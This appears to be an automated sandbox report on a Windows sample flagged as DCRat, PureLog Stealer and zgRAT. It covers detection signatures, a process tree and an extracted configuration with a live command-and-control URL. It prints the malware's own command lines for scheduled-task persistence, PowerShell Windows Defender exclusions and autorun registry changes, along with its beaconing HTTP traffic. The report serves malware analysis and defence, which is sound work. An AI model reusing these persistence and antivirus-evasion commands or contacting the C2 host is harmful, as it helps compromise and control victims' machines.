Edit tour

Windows Analysis Report
4Awb1u1GcJ.exe

Overview

General Information

Sample name:	4Awb1u1GcJ.exe renamed because original name is a hash value
Original sample name:	382EAEDC34BFC15B7E749FB8A0CFF600.exe
Analysis ID:	1562698
MD5:	382eaedc34bfc15b7e749fb8a0cff600
SHA1:	d8729997725a187120ee95e1d6068586a13ab678
SHA256:	e864306092df6d14c7214c505630f0df5faaa0f622331eec1dc9d3841de2847a
Tags:	DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected DCRat

Yara detected PureLog Stealer

Yara detected zgRAT

.NET source code contains method to dynamically call methods (often used by packers)

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Creates an undocumented autostart registry key

Creates multiple autostart registry keys

Creates processes via WMI

Infects executable files (exe, dll, sys, html)

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: System File Execution Location Anomaly

Tries to harvest and steal browser information (history, passwords, etc)

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Uses schtasks.exe or at.exe to add and modify task schedules

Allocates memory with a write watch (potentially for evading sandboxes)

Compiles C# or VB.Net code

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: CurrentVersion NT Autorun Keys Modification

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: Powershell Defender Exclusion

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

4Awb1u1GcJ.exe (PID: 5332 cmdline: "C:\Users\user\Desktop\4Awb1u1GcJ.exe" MD5: 382EAEDC34BFC15B7E749FB8A0CFF600)

csc.exe (PID: 2596 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lmfl24ds\lmfl24ds.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

conhost.exe (PID: 2664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cvtres.exe (PID: 6616 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE1D7.tmp" "c:\Windows\System32\CSC3F9C54C7EA774D8CB8E83128B6DCF481.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

schtasks.exe (PID: 1396 cmdline: schtasks.exe /create /tn "hxpWOXgnBGVLArPcwqxpuAh" /sc MINUTE /mo 13 /tr "'C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5284 cmdline: schtasks.exe /create /tn "hxpWOXgnBGVLArPcwqxpuAh" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 1396 cmdline: schtasks.exe /create /tn "4Awb1u1GcJ4" /sc MINUTE /mo 8 /tr "'C:\Users\user\Desktop\4Awb1u1GcJ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5284 cmdline: schtasks.exe /create /tn "4Awb1u1GcJ" /sc ONLOGON /tr "'C:\Users\user\Desktop\4Awb1u1GcJ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 1396 cmdline: schtasks.exe /create /tn "4Awb1u1GcJ4" /sc MINUTE /mo 10 /tr "'C:\Users\user\Desktop\4Awb1u1GcJ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

powershell.exe (PID: 5284 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 4504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5448 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\PrintHood\hxpWOXgnBGVLArPcwqxpuA.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 1396 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 4364 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7184 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\NetHood\dllhost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 8044 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

powershell.exe (PID: 7220 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\4Awb1u1GcJ.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7468 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\RM8EX6c6Td.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 7744 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 7884 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

dllhost.exe (PID: 7580 cmdline: "C:\Users\user\NetHood\dllhost.exe" MD5: 382EAEDC34BFC15B7E749FB8A0CFF600)

hxpWOXgnBGVLArPcwqxpuA.exe (PID: 4588 cmdline: C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe MD5: 382EAEDC34BFC15B7E749FB8A0CFF600)

hxpWOXgnBGVLArPcwqxpuA.exe (PID: 4040 cmdline: C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe MD5: 382EAEDC34BFC15B7E749FB8A0CFF600)

4Awb1u1GcJ.exe (PID: 7648 cmdline: C:\Users\user\Desktop\4Awb1u1GcJ.exe MD5: 382EAEDC34BFC15B7E749FB8A0CFF600)

4Awb1u1GcJ.exe (PID: 7776 cmdline: C:\Users\user\Desktop\4Awb1u1GcJ.exe MD5: 382EAEDC34BFC15B7E749FB8A0CFF600)

dllhost.exe (PID: 7828 cmdline: C:\Users\user\NetHood\dllhost.exe MD5: 382EAEDC34BFC15B7E749FB8A0CFF600)

dllhost.exe (PID: 7876 cmdline: C:\Users\user\NetHood\dllhost.exe MD5: 382EAEDC34BFC15B7E749FB8A0CFF600)

hxpWOXgnBGVLArPcwqxpuA.exe (PID: 344 cmdline: "C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe" MD5: 382EAEDC34BFC15B7E749FB8A0CFF600)

svchost.exe (PID: 1368 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

dllhost.exe (PID: 6732 cmdline: "C:\Users\user\NetHood\dllhost.exe" MD5: 382EAEDC34BFC15B7E749FB8A0CFF600)

4Awb1u1GcJ.exe (PID: 5024 cmdline: "C:\Users\user\Desktop\4Awb1u1GcJ.exe" MD5: 382EAEDC34BFC15B7E749FB8A0CFF600)

hxpWOXgnBGVLArPcwqxpuA.exe (PID: 7036 cmdline: "C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe" MD5: 382EAEDC34BFC15B7E749FB8A0CFF600)

dllhost.exe (PID: 4336 cmdline: "C:\Users\user\NetHood\dllhost.exe" MD5: 382EAEDC34BFC15B7E749FB8A0CFF600)

4Awb1u1GcJ.exe (PID: 1076 cmdline: "C:\Users\user\Desktop\4Awb1u1GcJ.exe" MD5: 382EAEDC34BFC15B7E749FB8A0CFF600)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://143840cm.nyashteam.ru/DefaultPublic", "MUTEX": "DCR_MUTEX-8ilaaP4rfi4CjOHXKSzR", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "true", "2": "true", "3": "true", "4": "true", "5": "true", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
4Awb1u1GcJ.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
4Awb1u1GcJ.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 3 entries

Memory Dumps

Source	Rule	Description	Author
00000000.00000000.1664770511.0000000000A42000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.1887728874.0000000012FBB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: 4Awb1u1GcJ.exe PID: 5332	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: dllhost.exe PID: 7580	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.4Awb1u1GcJ.exe.a40000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.0.4Awb1u1GcJ.exe.a40000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\4Awb1u1GcJ.exe, ProcessId: 5332, TargetFilename: C:\Users\user\NetHood\dllhost.exe

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: "C:\Users\Default\PrintHood\hxpWOXgnBGVLArPcwqxpuA.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\4Awb1u1GcJ.exe, ProcessId: 5332, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\hxpWOXgnBGVLArPcwqxpuA

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\4Awb1u1GcJ.exe", ParentImage: C:\Users\user\Desktop\4Awb1u1GcJ.exe, ParentProcessId: 5332, ParentProcessName: 4Awb1u1GcJ.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe', ProcessId: 5284, ProcessName: powershell.exe

Sigma detected: System File Execution Location Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\Users\user\NetHood\dllhost.exe, CommandLine: C:\Users\user\NetHood\dllhost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe, NewProcessName: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\NetHood\dllhost.exe, ProcessId: 7828, ProcessName: dllhost.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\4Awb1u1GcJ.exe, ProcessId: 5332, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\hxpWOXgnBGVLArPcwqxpuA

Sigma detected: CurrentVersion NT Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\4Awb1u1GcJ.exe, ProcessId: 5332, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lmfl24ds\lmfl24ds.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lmfl24ds\lmfl24ds.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\4Awb1u1GcJ.exe", ParentImage: C:\Users\user\Desktop\4Awb1u1GcJ.exe, ParentProcessId: 5332, ParentProcessName: 4Awb1u1GcJ.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lmfl24ds\lmfl24ds.cmdline", ProcessId: 2596, ProcessName: csc.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\4Awb1u1GcJ.exe, ProcessId: 5332, TargetFilename: C:\Users\user\AppData\Local\Temp\lmfl24ds\lmfl24ds.cmdline

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\4Awb1u1GcJ.exe", ParentImage: C:\Users\user\Desktop\4Awb1u1GcJ.exe, ParentProcessId: 5332, ParentProcessName: 4Awb1u1GcJ.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe', ProcessId: 5284, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 1368, ProcessName: svchost.exe

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lmfl24ds\lmfl24ds.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lmfl24ds\lmfl24ds.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\4Awb1u1GcJ.exe", ParentImage: C:\Users\user\Desktop\4Awb1u1GcJ.exe, ParentProcessId: 5332, ParentProcessName: 4Awb1u1GcJ.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lmfl24ds\lmfl24ds.cmdline", ProcessId: 2596, ProcessName: csc.exe

Suricata Signatures

ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-25T22:37:25.654935+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49735	37.44.238.250	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 4Awb1u1GcJ.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://143840cm.nyashteam.ru/DefaultPublic.php

Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\RM8EX6c6Td.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\IETDQDzo.log	Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Users\user\Desktop\RrNkXoHQ.log	Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Users\user\Desktop\YOJaOqPH.log	Avira: detection malicious, Label: TR/PSW.Agent.qngqt

Found malware configuration

Source: 00000000.00000002.1887728874.0000000012FBB000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: DCRat {"C2 url": "http://143840cm.nyashteam.ru/DefaultPublic", "MUTEX": "DCR_MUTEX-8ilaaP4rfi4CjOHXKSzR", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "true", "2": "true", "3": "true", "4": "true", "5": "true", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Multi AV Scanner detection for dropped file

Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	ReversingLabs: Detection: 60%
Source: C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe	ReversingLabs: Detection: 60%
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hxpWOXgnBGVLArPcwqxpuA.exe	ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	ReversingLabs: Detection: 60%
Source: C:\Users\user\Desktop\IETDQDzo.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\RrNkXoHQ.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\YOJaOqPH.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\cOkJseIw.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\greisgmx.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\uJayprRQ.log	ReversingLabs: Detection: 50%

Multi AV Scanner detection for submitted file

Source: 4Awb1u1GcJ.exe

ReversingLabs: Detection: 60%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\RrNkXoHQ.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\YOJaOqPH.log	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 4Awb1u1GcJ.exe

Joe Sandbox ML: detected

Source: 4Awb1u1GcJ.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Directory created: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe			Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Directory created: C:\Program Files\Windows Mail\33ddca35e40cf7			Jump to behavior

Source: 4Awb1u1GcJ.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Binary string: 7C:\Users\user\AppData\Local\Temp\lmfl24ds\lmfl24ds.pdb source: 4Awb1u1GcJ.exe, 00000000.00000002.1813149962.0000000003A6F000.00000004.00000800.00020000.00000000.sdmp

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

System file written: C:\Windows\System32\SecurityHealthSystray.exe

Jump to behavior

Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49735 -> 37.44.238.250:80

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: Joe Sandbox View

IP Address: 37.44.238.250 37.44.238.250

Source: Joe Sandbox View

ASN Name: HARMONYHOSTING-ASFR HARMONYHOSTING-ASFR

Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 384Expect: 100-continue
